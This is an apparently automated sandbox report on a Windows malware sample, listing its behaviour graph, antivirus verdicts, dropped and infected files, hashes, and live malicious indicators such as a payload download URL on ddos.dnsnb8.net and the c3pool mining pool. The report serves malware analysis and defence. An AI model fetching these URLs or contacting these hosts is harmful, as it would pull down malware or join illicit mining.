                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481620 Sample: LisectAVT_2403002B_48.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 49 auto.c3pool.org 2->49 51 ddos.dnsnb8.net 2->51 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus detection for URL or domain 2->65 67 Antivirus detection for dropped file 2->67 69 9 other signatures 2->69 8 LisectAVT_2403002B_48.exe 2 2 2->8         started        12 svchost.exe 1 2->12         started        14 svchost.exe 3 8 2->14         started        signatures3 process4 file5 35 C:\Users\user\AppData\...\winoshelper.dll, PE32 8->35 dropped 37 C:\Users\user\AppData\Local\Temp\VSFdoO.exe, PE32 8->37 dropped 71 Detected unpacking (changes PE section rights) 8->71 16 VSFdoO.exe 14 8->16         started        39 C:\Windows\SGuard.exe, PE32+ 12->39 dropped 73 Protects its processes via BreakOnTermination flag 12->73 75 Drops executables to the windows directory (C:\Windows) and starts them 12->75 21 SGuard.exe 2 12->21         started        23 WerFault.exe 2 14->23         started        signatures6 process7 dnsIp8 41 ddos.dnsnb8.net 44.221.84.105, 49730, 799 AMAZON-AESUS United States 16->41 29 C:\Program Files\7-Zip\Uninstall.exe, PE32 16->29 dropped 31 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 16->31 dropped 33 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 16->33 dropped 53 Antivirus detection for dropped file 16->53 55 Detected unpacking (changes PE section rights) 16->55 57 Machine Learning detection for dropped file 16->57 59 Infects executable files (exe, dll, sys, html) 16->59 25 WerFault.exe 21 16 16->25         started        43 5.161.70.189, 19999, 58665, 65157 HETZNER-ASDE Germany 21->43 45 auto.c3pool.org 5.75.158.61, 19999, 49745, 49752 HETZNER-ASDE Germany 21->45 47 88.198.117.174, 19999, 49744, 49746 HETZNER-ASDE Germany 21->47 27 conhost.exe 21->27         started        file9 61 Detected Stratum mining protocol 47->61 signatures10 process11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  LisectAVT_2403002B_48.exe100%AviraW32/Jadtre.B
                  LisectAVT_2403002B_48.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Windows\SGuard.exe100%AviraHEUR/AGEN.1313076
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
                  C:\Users\user\AppData\Roaming\winoshelper.dll100%AviraTR/ATRAPS.Gen
                  C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
                  C:\Users\user\AppData\Local\Temp\VSFdoO.exe100%AviraTR/Dldr.Small.Z.haljq
                  C:\Windows\SGuard.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\winoshelper.dll100%Joe Sandbox ML
                  C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\VSFdoO.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://www.scintilla.org/scite.rng0%URL Reputationsafe
                  http://www.rftp.comJosiah0%URL Reputationsafe
                  http://www.activestate.com0%URL Reputationsafe
                  http://www.activestate.comHolger0%URL Reputationsafe
                  http://upx.sf.net0%URL Reputationsafe
                  http://www.rftp.com0%URL Reputationsafe
                  http://www.baanboard.comBrendon0%URL Reputationsafe
                  https://www.smartsharesystems.com/0%URL Reputationsafe
                  http://www.scintilla.org0%URL Reputationsafe
                  http://www.spaceblue.comMathias0%URL Reputationsafe
                  https://www.smartsharesystems.com/Morten0%URL Reputationsafe
                  http://www.develop.com0%URL Reputationsafe
                  http://www.lua.org0%URL Reputationsafe
                  http://ddos.dnsnb8.net/100%URL Reputationmalware
                  http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
                  http://www.spaceblue.com0%URL Reputationsafe
                  http://www.baanboard.com0%URL Reputationsafe
                  http://www.develop.comDeepak0%URL Reputationsafe
                  http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
                  http://ddos.dnsnb8.net:799/cj//k1.rar8T.100%Avira URL Cloudphishing
                  http://ddos.dnsnb8.net:799/cj//k1.rary100%Avira URL Cloudphishing
                  http://ddos.dnsnb8.net:799/cj//k1.rarP100%Avira URL Cloudphishing
                  http://ddos.dnsnb8.net:799/cj//k1.rart100%Avira URL Cloudmalware
                  http://ddos.dnsnb8.net:799/cj//k1.raru100%Avira URL Cloudphishing
                  http://ddos.dnsnb8.net:799/cj//k1.rarPTF100%Avira URL Cloudphishing
                  http://ddos.dnsnb8.net:799/cj//k1.rarqT100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  auto.c3pool.org
                  5.75.158.61
                  truetrue
                    unknown
                    ddos.dnsnb8.net
                    44.221.84.105
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://ddos.dnsnb8.net:799/cj//k1.rartrue
                      • URL Reputation: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://ddos.dnsnb8.net:799/cj//k1.raryVSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      unknown
                      http://www.rftp.comJosiahSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.activestate.comSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://ddos.dnsnb8.net:799/cj//k1.raruVSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      unknown
                      http://www.activestate.comHolgerSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://ddos.dnsnb8.net:799/cj//k1.rartVSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEVSFdoO.exe, 00000001.00000003.1688795553.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ddos.dnsnb8.net:799/cj//k1.rarPVSFdoO.exe, 00000001.00000002.2146492689.000000000293A000.00000004.00000010.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      unknown
                      http://ddos.dnsnb8.net:799/cj//k1.rar8T.VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      unknown
                      http://upx.sf.netAmcache.hve.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.rftp.comSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.baanboard.comBrendonSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.smartsharesystems.com/SciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.scintilla.orgSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://ddos.dnsnb8.net:799/cj//k1.rarPTFVSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      unknown
                      http://www.develop.comSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.lua.orgSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://ddos.dnsnb8.net:799/cj//k1.rarqTVSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://ddos.dnsnb8.net/VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      unknown
                      http://www.spaceblue.comSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.baanboard.comSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.develop.comDeepakSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      5.75.158.61
                      auto.c3pool.orgGermany
                      24940HETZNER-ASDEtrue
                      5.161.70.189
                      unknownGermany
                      24940HETZNER-ASDEtrue
                      44.221.84.105
                      ddos.dnsnb8.netUnited States
                      14618AMAZON-AESUSfalse
                      88.198.117.174
                      unknownGermany
                      24940HETZNER-ASDEtrue
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1481620
                      Start date and time:2024-07-25 11:58:33 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 27s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:12
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:LisectAVT_2403002B_48.exe
                      Detection:MAL
                      Classification:mal100.rans.spre.troj.evad.mine.winEXE@14/19@67/4
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 32
                      • Number of non-executed functions: 44
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 52.168.117.173
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target svchost.exe, PID 6848 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadFile calls found.
                      • VT rate limit hit for: LisectAVT_2403002B_48.exe
                      TimeTypeDescription
                      05:59:28API Interceptor1303x Sleep call for process: SGuard.exe modified
                      06:00:11API Interceptor1x Sleep call for process: WerFault.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      5.75.158.61LisectAVT_2403002B_55.exeGet hashmaliciousXmrigBrowse
                        LisectAVT_2403002A_416.exeGet hashmaliciousXmrigBrowse
                          5.161.70.1894xHN38uqxB.exeGet hashmaliciousDoublePulsar, ETERNALBLUE, XmrigBrowse
                            logor.elfGet hashmaliciousXmrigBrowse
                              44.221.84.105LisectAVT_2403002B_470.exeGet hashmaliciousBdaejec, Petya, ReflectiveLoaderBrowse
                              • ddos.dnsnb8.net:799/cj//k1.rar
                              LisectAVT_2403002B_482.exeGet hashmaliciousBdaejec, RaccoonBrowse
                              • ddos.dnsnb8.net:799/cj//k2.rar
                              LisectAVT_2403002B_498.exeGet hashmaliciousBdaejecBrowse
                              • ddos.dnsnb8.net:799/cj//k2.rar
                              LisectAVT_2403002B_498.exeGet hashmaliciousBdaejecBrowse
                              • ddos.dnsnb8.net:799/cj//k3.rar
                              LisectAVT_2403002B_50.exeGet hashmaliciousBdaejecBrowse
                              • ddos.dnsnb8.net:799/cj//k1.rar
                              LisectAVT_2403002B_61.exeGet hashmaliciousBdaejecBrowse
                              • ddos.dnsnb8.net:799/cj//k2.rar
                              LisectAVT_2403002B_65.exeGet hashmaliciousBdaejec, BlackMoonBrowse
                              • ddos.dnsnb8.net:799/cj//k2.rar
                              LisectAVT_2403002B_72.exeGet hashmaliciousBdaejecBrowse
                              • ddos.dnsnb8.net:799/cj//k2.rar
                              LisectAVT_2403002B_7.exeGet hashmaliciousBdaejecBrowse
                              • ddos.dnsnb8.net:799/cj//k2.rar
                              LisectAVT_2403002B_72.exeGet hashmaliciousBdaejecBrowse
                              • ddos.dnsnb8.net:799/cj//k3.rar
                              88.198.117.174o00DuIdf3j.exeGet hashmaliciousXmrigBrowse
                                o00DuIdf3j.exeGet hashmaliciousXmrigBrowse
                                  xB6r0wPRyb.exeGet hashmaliciousXmrigBrowse
                                    c3p.exeGet hashmaliciousXmrigBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      auto.c3pool.orgLisectAVT_2403002B_55.exeGet hashmaliciousXmrigBrowse
                                      • 5.75.158.61
                                      LisectAVT_2403002A_416.exeGet hashmaliciousXmrigBrowse
                                      • 5.75.158.61
                                      o00DuIdf3j.exeGet hashmaliciousXmrigBrowse
                                      • 5.75.158.61
                                      o00DuIdf3j.exeGet hashmaliciousXmrigBrowse
                                      • 5.75.158.61
                                      xB6r0wPRyb.exeGet hashmaliciousXmrigBrowse
                                      • 5.75.158.61
                                      K4gsPJGEi4.exeGet hashmaliciousXmrigBrowse
                                      • 5.75.158.61
                                      x00zm3KVwb.exeGet hashmaliciousXmrigBrowse
                                      • 88.198.117.174
                                      4xHN38uqxB.exeGet hashmaliciousDoublePulsar, ETERNALBLUE, XmrigBrowse
                                      • 5.161.70.189
                                      UO2z4n1Sxx.exeGet hashmaliciousUnknownBrowse
                                      • 88.198.117.174
                                      4xHN38uqxB.exeGet hashmaliciousXmrigBrowse
                                      • 88.198.117.174
                                      ddos.dnsnb8.netLisectAVT_2403002B_470.exeGet hashmaliciousBdaejec, Petya, ReflectiveLoaderBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_482.exeGet hashmaliciousBdaejec, RaccoonBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_498.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_498.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_50.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_61.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_65.exeGet hashmaliciousBdaejec, BlackMoonBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_72.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_7.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_72.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      AMAZON-AESUSLisectAVT_2403002B_470.exeGet hashmaliciousBdaejec, Petya, ReflectiveLoaderBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_482.exeGet hashmaliciousBdaejec, RaccoonBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_498.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      arm7.elfGet hashmaliciousMiraiBrowse
                                      • 54.34.104.231
                                      LisectAVT_2403002B_498.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_50.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_61.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_65.exeGet hashmaliciousBdaejec, BlackMoonBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_72.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      LisectAVT_2403002B_7.exeGet hashmaliciousBdaejecBrowse
                                      • 44.221.84.105
                                      HETZNER-ASDELisectAVT_2403002B_51.exeGet hashmaliciousUnknownBrowse
                                      • 116.203.169.153
                                      LisectAVT_2403002B_486.exeGet hashmaliciousRedLineBrowse
                                      • 135.181.235.186
                                      LisectAVT_2403002B_51.exeGet hashmaliciousUnknownBrowse
                                      • 116.203.169.153
                                      LisectAVT_2403002B_55.exeGet hashmaliciousXmrigBrowse
                                      • 5.75.158.61
                                      LisectAVT_2403002B_59.dllGet hashmaliciousEmotetBrowse
                                      • 78.47.204.80
                                      LisectAVT_2403002C_119.exeGet hashmaliciousBdaejec, SodinokibiBrowse
                                      • 159.69.118.212
                                      Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                      • 95.217.240.177
                                      LisectAVT_2403002C_47.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 188.40.141.211
                                      LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                      • 128.140.125.116
                                      Q2XwE8NRLx.exeGet hashmaliciousQuasarBrowse
                                      • 195.201.57.90
                                      HETZNER-ASDELisectAVT_2403002B_51.exeGet hashmaliciousUnknownBrowse
                                      • 116.203.169.153
                                      LisectAVT_2403002B_486.exeGet hashmaliciousRedLineBrowse
                                      • 135.181.235.186
                                      LisectAVT_2403002B_51.exeGet hashmaliciousUnknownBrowse
                                      • 116.203.169.153
                                      LisectAVT_2403002B_55.exeGet hashmaliciousXmrigBrowse
                                      • 5.75.158.61
                                      LisectAVT_2403002B_59.dllGet hashmaliciousEmotetBrowse
                                      • 78.47.204.80
                                      LisectAVT_2403002C_119.exeGet hashmaliciousBdaejec, SodinokibiBrowse
                                      • 159.69.118.212
                                      Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                      • 95.217.240.177
                                      LisectAVT_2403002C_47.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 188.40.141.211
                                      LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                      • 128.140.125.116
                                      Q2XwE8NRLx.exeGet hashmaliciousQuasarBrowse
                                      • 195.201.57.90
                                      HETZNER-ASDELisectAVT_2403002B_51.exeGet hashmaliciousUnknownBrowse
                                      • 116.203.169.153
                                      LisectAVT_2403002B_486.exeGet hashmaliciousRedLineBrowse
                                      • 135.181.235.186
                                      LisectAVT_2403002B_51.exeGet hashmaliciousUnknownBrowse
                                      • 116.203.169.153
                                      LisectAVT_2403002B_55.exeGet hashmaliciousXmrigBrowse
                                      • 5.75.158.61
                                      LisectAVT_2403002B_59.dllGet hashmaliciousEmotetBrowse
                                      • 78.47.204.80
                                      LisectAVT_2403002C_119.exeGet hashmaliciousBdaejec, SodinokibiBrowse
                                      • 159.69.118.212
                                      Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                      • 95.217.240.177
                                      LisectAVT_2403002C_47.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 188.40.141.211
                                      LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                      • 128.140.125.116
                                      Q2XwE8NRLx.exeGet hashmaliciousQuasarBrowse
                                      • 195.201.57.90
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Local\Temp\VSFdoO.exeLisectAVT_2403002B_470.exeGet hashmaliciousBdaejec, Petya, ReflectiveLoaderBrowse
                                        LisectAVT_2403002B_482.exeGet hashmaliciousBdaejec, RaccoonBrowse
                                          LisectAVT_2403002B_498.exeGet hashmaliciousBdaejecBrowse
                                            LisectAVT_2403002B_498.exeGet hashmaliciousBdaejecBrowse
                                              LisectAVT_2403002B_50.exeGet hashmaliciousBdaejecBrowse
                                                LisectAVT_2403002B_61.exeGet hashmaliciousBdaejecBrowse
                                                  LisectAVT_2403002B_65.exeGet hashmaliciousBdaejec, BlackMoonBrowse
                                                    LisectAVT_2403002B_72.exeGet hashmaliciousBdaejecBrowse
                                                      LisectAVT_2403002B_7.exeGet hashmaliciousBdaejecBrowse
                                                        LisectAVT_2403002B_72.exeGet hashmaliciousBdaejecBrowse
                                                          Process:C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):19456
                                                          Entropy (8bit):6.590704438552131
                                                          Encrypted:false
                                                          SSDEEP:384:1FqSXXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:7ZQGPL4vzZq2o9W7GsxBbPr
                                                          MD5:1DDC01915581FBBB26ADA5DE1F5A4579
                                                          SHA1:BFE4CF63B11F1CBA48250D27AA5EA7B895DB12E7
                                                          SHA-256:B05A3C462B6B96FC5A782D165F004759FBB2BA3EDCEA36E5B348DC03F7ECE92D
                                                          SHA-512:C0088E6781DE09EBCA0F72EB9C05C329D71428520D2F682292AD97EA64F996DEAFD34F0B0038159E5C8D0A455ACF75183ECF4C3995221CE7700D8435436A88E0
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                                          Process:C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:modified
                                                          Size (bytes):2389504
                                                          Entropy (8bit):6.731347997143091
                                                          Encrypted:false
                                                          SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                                          MD5:E52B8B08EB2869AAE73852D3DA9EE9FF
                                                          SHA1:C06D171EB3826E6CA394CBBEE44EE8E3A495B3B9
                                                          SHA-256:E7E0F5D9B8DECB3DF6D94CD9BEB7653A5662464E68372F43071FF829210342B7
                                                          SHA-512:9A024DDA5B5580E4DFA9D0CF141A779E200A57E553346E3B0B2A1C9D86621E81E3B72361DC109EE7A6A3C7D6F697DDB3964C7E00E5D036B6CDA8DA8FCD5BF91B
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):31744
                                                          Entropy (8bit):6.366925459370854
                                                          Encrypted:false
                                                          SSDEEP:768:uWQ3655Kv1X/qY1MSdfgQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdfrGCq2iW7z
                                                          MD5:DC0FE5F7C6B9D2F6E5114F9456EA7C1E
                                                          SHA1:209D11872FA6E6497038D1962CF62635932B37A6
                                                          SHA-256:490B5A327E4EB52E81F230FA5908A0B6CE0987D3E6533C011865D5CF776279A0
                                                          SHA-512:1D2B1DC3D74B56E84A3C4897D2C4145D377F97AF7854F884CF9D3619D9A71EC39F1822910BAF72F02FCCAF44C6DE9C8952789FFEC1B049EE7E3BD2BC2C226884
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9861253084743543
                                                          Encrypted:false
                                                          SSDEEP:192:Yknubbty0Zuwpxxj8/AmzuiFHZ24IO89H:bKbt5ZuwZjwzuiFHY4IO89
                                                          MD5:E20DAEED5B6960625A1223DEEDC64671
                                                          SHA1:19CF4F363EBBD55710A7B3B7DD4B685FAD599367
                                                          SHA-256:517EEB31ACAD5D9A88BDC1996B53A5E772CC7BEA9EA94CD7EC1680A5279B29B8
                                                          SHA-512:C68F15DA5A377115BF7239AA5F3779E44B1E11FDB848BDB7915DA29D5ED92BC7F455C2F3F5BC9CCDD47D601F5742462EB4E4C45DB4F6FC7C518E4C598CA16E68
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.7.5.1.7.5.6.9.7.4.0.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.7.5.1.7.8.2.2.8.6.5.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.5.2.4.6.9.d.-.2.b.b.b.-.4.1.7.3.-.a.2.e.9.-.c.9.d.8.e.2.3.b.4.2.7.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.1.5.d.f.1.a.-.1.b.2.b.-.4.b.4.a.-.8.9.1.3.-.a.9.3.0.9.7.6.6.5.d.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.S.F.d.o.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.0.c.-.0.0.0.1.-.0.0.1.4.-.b.4.0.5.-.5.0.5.5.7.9.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.e.5.1.f.a.6.6.9.f.b.0.8.2.a.7.c.1.7.d.6.2.a.b.7.8.f.6.3.a.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.V.S.F.d.o.O...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Thu Jul 25 09:59:37 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):158326
                                                          Entropy (8bit):1.880228198198758
                                                          Encrypted:false
                                                          SSDEEP:768:FN7S9eVB9rh+12Tdw5sKfIq19CJRaTDS3:FN7SY7+1c25sKfIneS
                                                          MD5:BB0341927507D0A9952FC478A1592455
                                                          SHA1:E3962B7F1F396D2987E86AFFDF9F2863769DE30C
                                                          SHA-256:559AAB39C90D38CD66A99DC5028911F0FBD208EB070CCCE341320DE7ED638404
                                                          SHA-512:676D2E37D7874F17BAC86DDBE7A9BC4F291D87D59B1C33C004CDA0DC74D4FED31638A9FEF95F7C76521246398A617DEE0108673F8ED801AF7958D6106F5EB59C
                                                          Malicious:false
                                                          Reputation:low
